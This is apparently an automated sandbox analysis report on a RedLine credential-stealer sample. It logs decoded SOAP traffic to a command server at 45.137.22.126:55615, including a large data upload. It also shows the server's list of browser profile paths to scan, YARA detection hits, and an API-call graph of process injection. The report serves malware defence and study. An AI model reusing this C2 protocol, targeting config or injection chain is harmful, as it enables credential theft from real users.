                                                                                                                                            Nov 17, 2024 03:07:14.211786032 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.211854935 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.211867094 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.211914062 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.211925030 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.211937904 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.211976051 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212034941 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212045908 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212084055 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212129116 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212178946 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212189913 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212256908 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212268114 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212287903 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212299109 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212349892 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212362051 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212382078 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212393045 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212445974 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212457895 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212469101 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212490082 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212501049 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212512970 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212532997 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212543964 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212554932 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212567091 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212587118 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212598085 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212619066 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212629080 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212649107 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212661028 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212681055 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212692022 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212704897 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212744951 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212779999 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212806940 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212829113 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212842941 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212862015 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212872982 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212883949 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212894917 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212914944 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212925911 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212946892 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212959051 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.212970972 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:14.256872892 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:15.467576981 CET556154973845.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:15.528460026 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:15.595179081 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:15.595650911 CET4973855615192.168.2.445.137.22.126
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 17, 2024 03:07:08.826909065 CET5284453192.168.2.41.1.1.1
                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Nov 17, 2024 03:07:08.826909065 CET192.168.2.41.1.1.10x5ba4Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Nov 17, 2024 03:07:08.833874941 CET1.1.1.1192.168.2.40x5ba4No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            • 45.137.22.126:55615
                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.44973345.137.22.126556157712C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 17, 2024 03:07:02.587853909 CET240OUTPOST / HTTP/1.1
                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                            Host: 45.137.22.126:55615
                                                                                                                                            Content-Length: 137
                                                                                                                                            Expect: 100-continue
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 17, 2024 03:07:03.422421932 CET359INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 212
                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                            Date: Sun, 17 Nov 2024 02:07:02 GMT
                                                                                                                                            Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                            Nov 17, 2024 03:07:08.471224070 CET223OUTPOST / HTTP/1.1
                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                            SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                                            Host: 45.137.22.126:55615
                                                                                                                                            Content-Length: 144
                                                                                                                                            Expect: 100-continue
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            Nov 17, 2024 03:07:08.786478996 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 4744
                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                            Date: Sun, 17 Nov 2024 02:07:08 GMT
                                                                                                                                            Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                                                                            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.44973745.137.22.126556157712C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 17, 2024 03:07:11.420854092 CET221OUTPOST / HTTP/1.1
                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                            SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                            Host: 45.137.22.126:55615
                                                                                                                                            Content-Length: 928651
                                                                                                                                            Expect: 100-continue
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            Nov 17, 2024 03:07:13.577146053 CET294INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 147
                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                            Date: Sun, 17 Nov 2024 02:07:12 GMT
                                                                                                                                            Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.44973845.137.22.126556157712C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 17, 2024 03:07:13.584538937 CET241OUTPOST / HTTP/1.1
                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                            SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                            Host: 45.137.22.126:55615
                                                                                                                                            Content-Length: 928643
                                                                                                                                            Expect: 100-continue
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 17, 2024 03:07:15.467576981 CET408INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 261
                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                            Date: Sun, 17 Nov 2024 02:07:14 GMT
                                                                                                                                            Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                                            Click to jump to process

                                                                                                                                            Click to jump to process

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Click to jump to process

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:21:06:57
                                                                                                                                            Start date:16/11/2024
                                                                                                                                            Path:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\9dOKGgFNL2.exe"
                                                                                                                                            Imagebase:0xff0000
                                                                                                                                            File size:534'528 bytes
                                                                                                                                            MD5 hash:020EC1DF3B8B9D28DA16EDAF0D50A262
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:2
                                                                                                                                            Start time:21:07:01
                                                                                                                                            Start date:16/11/2024
                                                                                                                                            Path:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\9dOKGgFNL2.exe"
                                                                                                                                            Imagebase:0xb30000
                                                                                                                                            File size:534'528 bytes
                                                                                                                                            MD5 hash:020EC1DF3B8B9D28DA16EDAF0D50A262
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:21:07:01
                                                                                                                                            Start date:16/11/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:10.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:2.3%
                                                                                                                                              Total number of Nodes:256
                                                                                                                                              Total number of Limit Nodes:12
                                                                                                                                              execution_graph 33058 6598ff8 33059 659901f 33058->33059 33061 6599121 33059->33061 33062 7d78761 33059->33062 33063 7d7876f 33062->33063 33066 7d787c5 33062->33066 33063->33061 33064 7d78963 33064->33061 33066->33064 33067 7d72ba0 33066->33067 33068 7d78a58 PostMessageW 33067->33068 33069 7d78ac4 33068->33069 33069->33066 33070 31fd7a8 DuplicateHandle 33071 31fd83e 33070->33071 33072 31f4668 33073 31f467a 33072->33073 33074 31f4686 33073->33074 33078 31f4778 33073->33078 33083 31f3e28 33074->33083 33076 31f46a5 33079 31f479d 33078->33079 33087 31f4878 33079->33087 33091 31f4888 33079->33091 33084 31f3e33 33083->33084 33099 31f5c84 33084->33099 33086 31f6ffb 33086->33076 33089 31f4888 33087->33089 33088 31f498c 33088->33088 33089->33088 33095 31f44b0 33089->33095 33093 31f48af 33091->33093 33092 31f498c 33092->33092 33093->33092 33094 31f44b0 CreateActCtxA 33093->33094 33094->33092 33096 31f5918 CreateActCtxA 33095->33096 33098 31f59db 33096->33098 33098->33098 33100 31f5c8f 33099->33100 33103 31f5ca4 33100->33103 33102 31f720d 33102->33086 33104 31f5caf 33103->33104 33107 31f5cd4 33104->33107 33106 31f72e2 33106->33102 33108 31f5cdf 33107->33108 33111 31f5d04 33108->33111 33110 31f73e5 33110->33106 33112 31f5d0f 33111->33112 33114 31f86eb 33112->33114 33117 31fad98 33112->33117 33113 31f8729 33113->33110 33114->33113 33121 31fce81 33114->33121 33126 31fadd0 33117->33126 33129 31fadbf 33117->33129 33118 31fadae 33118->33114 33122 31fceb1 33121->33122 33123 31fced5 33122->33123 33139 31fd438 33122->33139 33143 31fd448 33122->33143 33123->33113 33133 31faeb8 33126->33133 33127 31faddf 33127->33118 33130 31fadd0 33129->33130 33132 31faeb8 GetModuleHandleW 33130->33132 33131 31faddf 33131->33118 33132->33131 33134 31fae62 33133->33134 33136 31faec2 33133->33136 33134->33127 33135 31faefc 33135->33127 33136->33135 33137 31fb100 GetModuleHandleW 33136->33137 33138 31fb12d 33137->33138 33138->33127 33140 31fd448 33139->33140 33141 31fd48f 33140->33141 33147 31fd034 33140->33147 33141->33123 33144 31fd455 33143->33144 33145 31fd034 GetModuleHandleW 33144->33145 33146 31fd48f 33144->33146 33145->33146 33146->33123 33148 31fd03f 33147->33148 33150 31fdda0 33148->33150 33151 31fd15c 33148->33151 33150->33150 33152 31fd167 33151->33152 33153 31f5d04 GetModuleHandleW 33152->33153 33154 31fde0f 33153->33154 33154->33150 32836 65934d0 32837 659350a 32836->32837 32838 659359b 32837->32838 32839 6593586 32837->32839 32841 65911fc 3 API calls 32838->32841 32844 65911fc 32839->32844 32843 65935aa 32841->32843 32846 6591207 32844->32846 32845 6593591 32846->32845 32849 6593ef0 32846->32849 32855 6593edf 32846->32855 32851 6593f0a 32849->32851 32861 6591244 32849->32861 32852 6593f17 32851->32852 32853 6593f40 CreateIconFromResourceEx 32851->32853 32852->32845 32854 6593fbe 32853->32854 32854->32845 32856 6591244 CreateIconFromResourceEx 32855->32856 32857 6593f0a 32856->32857 32858 6593f17 32857->32858 32859 6593f40 CreateIconFromResourceEx 32857->32859 32858->32845 32860 6593fbe 32859->32860 32860->32845 32862 6593f40 CreateIconFromResourceEx 32861->32862 32863 6593fbe 32862->32863 32863->32851 32864 7d7661e 32865 7d76624 32864->32865 32866 7d76688 32865->32866 32870 7d775d6 32865->32870 32890 7d77570 32865->32890 32909 7d77561 32865->32909 32871 7d77564 32870->32871 32873 7d775d9 32870->32873 32872 7d77592 32871->32872 32928 7d782f5 32871->32928 32933 7d77a2b 32871->32933 32938 7d77def 32871->32938 32942 7d779a0 32871->32942 32947 7d77ee0 32871->32947 32952 7d77ba4 32871->32952 32956 7d77be7 32871->32956 32962 7d781c7 32871->32962 32967 7d77a5c 32871->32967 32972 7d77cfc 32871->32972 32979 7d779bd 32871->32979 32984 7d77b1e 32871->32984 32988 7d7845f 32871->32988 32992 7d77bf1 32871->32992 32996 7d77af2 32871->32996 33001 7d78074 32871->33001 32872->32866 32873->32866 32891 7d7758a 32890->32891 32892 7d782f5 2 API calls 32891->32892 32893 7d78074 2 API calls 32891->32893 32894 7d77af2 2 API calls 32891->32894 32895 7d77bf1 2 API calls 32891->32895 32896 7d7845f 2 API calls 32891->32896 32897 7d77b1e 2 API calls 32891->32897 32898 7d779bd 2 API calls 32891->32898 32899 7d77cfc 4 API calls 32891->32899 32900 7d77a5c 2 API calls 32891->32900 32901 7d781c7 2 API calls 32891->32901 32902 7d77be7 2 API calls 32891->32902 32903 7d77592 32891->32903 32904 7d77ba4 2 API calls 32891->32904 32905 7d77ee0 2 API calls 32891->32905 32906 7d779a0 2 API calls 32891->32906 32907 7d77def 2 API calls 32891->32907 32908 7d77a2b 2 API calls 32891->32908 32892->32903 32893->32903 32894->32903 32895->32903 32896->32903 32897->32903 32898->32903 32899->32903 32900->32903 32901->32903 32902->32903 32903->32866 32904->32903 32905->32903 32906->32903 32907->32903 32908->32903 32910 7d77564 32909->32910 32911 7d77592 32910->32911 32912 7d782f5 2 API calls 32910->32912 32913 7d78074 2 API calls 32910->32913 32914 7d77af2 2 API calls 32910->32914 32915 7d77bf1 2 API calls 32910->32915 32916 7d7845f 2 API calls 32910->32916 32917 7d77b1e 2 API calls 32910->32917 32918 7d779bd 2 API calls 32910->32918 32919 7d77cfc 4 API calls 32910->32919 32920 7d77a5c 2 API calls 32910->32920 32921 7d781c7 2 API calls 32910->32921 32922 7d77be7 2 API calls 32910->32922 32923 7d77ba4 2 API calls 32910->32923 32924 7d77ee0 2 API calls 32910->32924 32925 7d779a0 2 API calls 32910->32925 32926 7d77def 2 API calls 32910->32926 32927 7d77a2b 2 API calls 32910->32927 32911->32866 32912->32911 32913->32911 32914->32911 32915->32911 32916->32911 32917->32911 32918->32911 32919->32911 32920->32911 32921->32911 32922->32911 32923->32911 32924->32911 32925->32911 32926->32911 32927->32911 32929 7d782fb 32928->32929 33006 7d76070 32929->33006 33010 7d76069 32929->33010 32930 7d7831e 32934 7d77a2e 32933->32934 33014 7d761fc 32934->33014 33018 7d76208 32934->33018 32939 7d77b1e 32938->32939 33022 7d75ec0 32939->33022 33026 7d75eb8 32939->33026 32943 7d779a6 32942->32943 32944 7d77aac 32943->32944 32945 7d761fc CreateProcessA 32943->32945 32946 7d76208 CreateProcessA 32943->32946 32944->32872 32945->32944 32946->32944 32948 7d77ee6 32947->32948 33030 7d75f80 32948->33030 33034 7d75f78 32948->33034 32949 7d78402 32954 7d75f80 WriteProcessMemory 32952->32954 32955 7d75f78 WriteProcessMemory 32952->32955 32953 7d77bc8 32953->32872 32954->32953 32955->32953 32958 7d77c51 32956->32958 32957 7d77f07 32957->32872 32958->32957 33038 7d75900 32958->33038 33042 7d758f9 32958->33042 32959 7d78369 32963 7d781e2 32962->32963 32965 7d75900 ResumeThread 32963->32965 32966 7d758f9 ResumeThread 32963->32966 32964 7d78369 32965->32964 32966->32964 32968 7d77a61 32967->32968 32970 7d761fc CreateProcessA 32968->32970 32971 7d76208 CreateProcessA 32968->32971 32969 7d77aac 32969->32872 32970->32969 32971->32969 33046 7d75de0 32972->33046 33050 7d75de8 32972->33050 32973 7d77d16 32975 7d75900 ResumeThread 32973->32975 32976 7d758f9 ResumeThread 32973->32976 32974 7d78369 32975->32974 32976->32974 32980 7d779cf 32979->32980 32981 7d77aac 32980->32981 32982 7d761fc CreateProcessA 32980->32982 32983 7d76208 CreateProcessA 32980->32983 32981->32872 32982->32981 32983->32981 32985 7d77b24 32984->32985 32986 7d75ec0 VirtualAllocEx 32985->32986 32987 7d75eb8 VirtualAllocEx 32985->32987 32986->32985 32987->32985 32990 7d75f80 WriteProcessMemory 32988->32990 32991 7d75f78 WriteProcessMemory 32988->32991 32989 7d78492 32990->32989 32991->32989 32994 7d75de0 Wow64SetThreadContext 32992->32994 32995 7d75de8 Wow64SetThreadContext 32992->32995 32993 7d77c0b 32993->32872 32994->32993 32995->32993 32997 7d77b18 32996->32997 32998 7d78492 32997->32998 32999 7d75f80 WriteProcessMemory 32997->32999 33000 7d75f78 WriteProcessMemory 32997->33000 32999->32998 33000->32998 33002 7d782fc 33001->33002 33003 7d7831e 33002->33003 33004 7d76070 ReadProcessMemory 33002->33004 33005 7d76069 ReadProcessMemory 33002->33005 33004->33003 33005->33003 33007 7d760bb ReadProcessMemory 33006->33007 33009 7d760ff 33007->33009 33009->32930 33011 7d76070 ReadProcessMemory 33010->33011 33013 7d760ff 33011->33013 33013->32930 33015 7d76206 CreateProcessA 33014->33015 33017 7d76453 33015->33017 33017->33017 33019 7d7626f CreateProcessA 33018->33019 33021 7d76453 33019->33021 33021->33021 33023 7d75f00 VirtualAllocEx 